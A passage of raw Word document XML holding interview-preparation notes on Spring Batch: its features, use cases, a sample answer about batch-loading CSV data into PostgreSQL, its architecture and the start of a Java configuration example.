          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a robust </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>batch processing framework</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> built on top of the Spring framework. It is designed to handle large volumes of data and jobs such as:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0D48DE" w14:textId="77777777" w:rsidR="00EF625B" w:rsidRPr="00CE4B95" w:rsidRDefault="00EF625B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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ading from a database, file, or queue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB15EB0" w14:textId="77777777" w:rsidR="00EF625B" w:rsidRPr="00CE4B95" w:rsidRDefault="00EF625B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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ocessing/transformation of data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258A7150" w14:textId="77777777" w:rsidR="00EF625B" w:rsidRPr="00CE4B95" w:rsidRDefault="00EF625B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21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riting results to a database, file, or other systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B29C8C7" w14:textId="77777777" w:rsidR="00EF625B" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00EF625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DCE2B18">
          <v:rect id="_x0000_i2166" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D085569" w14:textId="77777777" w:rsidR="00EF625B" w:rsidRPr="00CE4B95" w:rsidRDefault="00EF625B" w:rsidP="00EF625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Features of Spring Batch</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21"/>
        <w:gridCol w:w="5421"/>
      </w:tblGrid>
      <w:tr w:rsidR="00EF625B" w:rsidRPr="00CE4B95" w14:paraId="1128C3B7" w14:textId="77777777" w:rsidTr="00EF625B">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="63C14BD3" w14:textId="77777777" w:rsidR="00EF625B" w:rsidRPr="00CE4B95" w:rsidRDefault="00EF625B" w:rsidP="009604BA">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0986BDB7" w14:textId="77777777" w:rsidR="00EF625B" w:rsidRPr="00CE4B95" w:rsidRDefault="00EF625B" w:rsidP="009604BA">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EF625B" w:rsidRPr="00CE4B95" w14:paraId="4009A231" w14:textId="77777777" w:rsidTr="00EF625B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="63E8F9BA" w14:textId="77777777" w:rsidR="00EF625B" w:rsidRPr="00CE4B95" w:rsidRDefault="00EF625B" w:rsidP="00EF625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hunk-based processing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7BC141E3" w14:textId="77777777" w:rsidR="00EF625B" w:rsidRPr="00CE4B95" w:rsidRDefault="00EF625B" w:rsidP="00EF625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ads, processes, and writes records in chunks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EF625B" w:rsidRPr="00CE4B95" w14:paraId="543F0124" w14:textId="77777777" w:rsidTr="00EF625B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4CA00E09" w14:textId="77777777" w:rsidR="00EF625B" w:rsidRPr="00CE4B95" w:rsidRDefault="00EF625B" w:rsidP="00EF625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try/Skip logic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3347601D" w14:textId="77777777" w:rsidR="00EF625B" w:rsidRPr="00CE4B95" w:rsidRDefault="00EF625B" w:rsidP="00EF625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uilt-in support for fault tolerance</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EF625B" w:rsidRPr="00CE4B95" w14:paraId="705388D6" w14:textId="77777777" w:rsidTr="00EF625B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="101B9C4C" w14:textId="77777777" w:rsidR="00EF625B" w:rsidRPr="00CE4B95" w:rsidRDefault="00EF625B" w:rsidP="00EF625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ob Scheduling</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E47B766" w14:textId="77777777" w:rsidR="00EF625B" w:rsidRPr="00CE4B95" w:rsidRDefault="00EF625B" w:rsidP="00EF625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gration with schedulers like Quartz, cron, etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EF625B" w:rsidRPr="00CE4B95" w14:paraId="1C280FF8" w14:textId="77777777" w:rsidTr="00EF625B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4FB57034" w14:textId="77777777" w:rsidR="00EF625B" w:rsidRPr="00CE4B95" w:rsidRDefault="00EF625B" w:rsidP="00EF625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ransaction Management</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7E9E5B78" w14:textId="77777777" w:rsidR="00EF625B" w:rsidRPr="00CE4B95" w:rsidRDefault="00EF625B" w:rsidP="00EF625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sures consistency using Spring transactions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EF625B" w:rsidRPr="00CE4B95" w14:paraId="051A6F94" w14:textId="77777777" w:rsidTr="00EF625B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="47F95CDC" w14:textId="77777777" w:rsidR="00EF625B" w:rsidRPr="00CE4B95" w:rsidRDefault="00EF625B" w:rsidP="00EF625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ob Repository</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="446C2D80" w14:textId="77777777" w:rsidR="00EF625B" w:rsidRPr="00CE4B95" w:rsidRDefault="00EF625B" w:rsidP="00EF625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acks job execution status, metadata</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EF625B" w:rsidRPr="00CE4B95" w14:paraId="4D15A0D3" w14:textId="77777777" w:rsidTr="00EF625B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="62373FB4" w14:textId="77777777" w:rsidR="00EF625B" w:rsidRPr="00CE4B95" w:rsidRDefault="00EF625B" w:rsidP="00EF625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rallel Processing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C93CC68" w14:textId="77777777" w:rsidR="00EF625B" w:rsidRPr="00CE4B95" w:rsidRDefault="00EF625B" w:rsidP="00EF625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pports multithreading, partitioning, and remote chunking</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="51C79FFC" w14:textId="77777777" w:rsidR="00EF625B" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00EF625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9581049">
          <v:rect id="_x0000_i2167" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="72515E83" w14:textId="77777777" w:rsidR="00EF625B" w:rsidRPr="00CE4B95" w:rsidRDefault="00EF625B" w:rsidP="00EF625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mmon Use Cases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A3AADF" w14:textId="77777777" w:rsidR="00EF625B" w:rsidRPr="00CE4B95" w:rsidRDefault="00EF625B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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TL jobs (Extract, Transform, Load)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FDEFA6A" w14:textId="77777777" w:rsidR="00EF625B" w:rsidRPr="00CE4B95" w:rsidRDefault="00EF625B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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port generation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68398055" w14:textId="77777777" w:rsidR="00EF625B" w:rsidRPr="00CE4B95" w:rsidRDefault="00EF625B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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le transformation (CSV/Excel to DB or vice versa)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00FD3631" w14:textId="77777777" w:rsidR="00EF625B" w:rsidRPr="00CE4B95" w:rsidRDefault="00EF625B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21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ata migration and cleanup tasks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D14AC34" w14:textId="77777777" w:rsidR="00EF625B" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00EF625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758ED2">
          <v:rect id="_x0000_i2168" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1EF56B" w14:textId="77777777" w:rsidR="00EF625B" w:rsidRPr="00CE4B95" w:rsidRDefault="00EF625B" w:rsidP="00EF625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w:t>
      </w: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ere Have I Used Spring Batch?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57BA0DDB" w14:textId="77777777" w:rsidR="00EF625B" w:rsidRPr="00CE4B95" w:rsidRDefault="00EF625B" w:rsidP="00EF625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re's how you can explain it in an interview:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B27615" w14:textId="77777777" w:rsidR="00EF625B" w:rsidRPr="00CE4B95" w:rsidRDefault="00EF625B" w:rsidP="00EF625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my previous project, we implemented </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Batch</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for processing large CSV files containing transactional data. Each file had over 500,000 records.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3468D035" w14:textId="77777777" w:rsidR="00EF625B" w:rsidRPr="00CE4B95" w:rsidRDefault="00EF625B" w:rsidP="00EF625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ur batch job:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34084D28" w14:textId="77777777" w:rsidR="00EF625B" w:rsidRPr="00CE4B95" w:rsidRDefault="00EF625B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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ad</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> data from the CSV</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D84D172" w14:textId="77777777" w:rsidR="00EF625B" w:rsidRPr="00CE4B95" w:rsidRDefault="00EF625B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Validated</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> each record using a custom validator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B63DB0E" w14:textId="77777777" w:rsidR="00EF625B" w:rsidRPr="00CE4B95" w:rsidRDefault="00EF625B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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ransformed</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> records (e.g., date formats, enums)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D77D5B" w14:textId="77777777" w:rsidR="00EF625B" w:rsidRPr="00CE4B95" w:rsidRDefault="00EF625B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21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Wrote</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the cleaned data into a PostgreSQL database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F0DAA8" w14:textId="77777777" w:rsidR="00EF625B" w:rsidRPr="00CE4B95" w:rsidRDefault="00EF625B" w:rsidP="00EF625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e configured chunk size as 500 and added </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>fault tolerance</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for skipping corrupt records while logging them for review.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Also, we used JobLauncher to trigger the job from a REST endpoint and integrated the job scheduling with </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Boot + Quartz</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14014DA1" w14:textId="77777777" w:rsidR="00EF625B" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00EF625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F4E104">
          <v:rect id="_x0000_i2169" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="110BD0DD" w14:textId="77777777" w:rsidR="00EF625B" w:rsidRPr="00CE4B95" w:rsidRDefault="00EF625B" w:rsidP="00EF625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pring Batch Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D586AAE" w14:textId="77777777" w:rsidR="00EF625B" w:rsidRPr="00CE4B95" w:rsidRDefault="00EF625B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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ob</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → Entire batch job</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14015820" w14:textId="77777777" w:rsidR="00EF625B" w:rsidRPr="00CE4B95" w:rsidRDefault="00EF625B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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ep</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → Single unit of work in a job</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129E7EF9" w14:textId="77777777" w:rsidR="00EF625B" w:rsidRPr="00CE4B95" w:rsidRDefault="00EF625B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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temReader</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → Reads data (from DB, file, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6579C489" w14:textId="77777777" w:rsidR="00EF625B" w:rsidRPr="00CE4B95" w:rsidRDefault="00EF625B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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temProcessor</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → Transforms data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B75B0D0" w14:textId="77777777" w:rsidR="00EF625B" w:rsidRPr="00CE4B95" w:rsidRDefault="00EF625B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21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temWriter</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → Writes data (to DB, file, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0CC466" w14:textId="77777777" w:rsidR="00EF625B" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00EF625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68F7F3">
          <v:rect id="_x0000_i2170" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD756AC" w14:textId="77777777" w:rsidR="00EF625B" w:rsidRPr="00CE4B95" w:rsidRDefault="00EF625B" w:rsidP="00EF625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Basic Configuration Example (Java Config)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1D8C65" w14:textId="77777777" w:rsidR="00215039" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@Bean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049FD78F" w14:textId="77777777" w:rsidR="00215039" w:rsidRPr="00CE4B95"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Job</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> myJob</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JobBuilderFactory</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> jobBuilde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ep</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> mySte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31D4CC3" w14:textId="77777777" w:rsidR="00215039" w:rsidRPr="00CE4B95"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jobBuilder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myJob"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16169714" w14:textId="77777777" w:rsidR="00215039" w:rsidRPr="00CE4B95"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crementer</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unIdIncrementer</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BAEA39F" w14:textId="77777777" w:rsidR="00215039" w:rsidRPr="00CE4B95"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l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yStep</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C7F4EF" w14:textId="77777777" w:rsidR="00215039" w:rsidRPr="00CE4B95"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end</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130C5D81" w14:textId="77777777" w:rsidR="00215039" w:rsidRPr="00CE4B95"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uild</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6BC7E6" w14:textId="77777777" w:rsidR="00215039" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE09893" w14:textId="77777777" w:rsidR="00215039" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4A06F6" w14:textId="77777777" w:rsidR="00215039" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
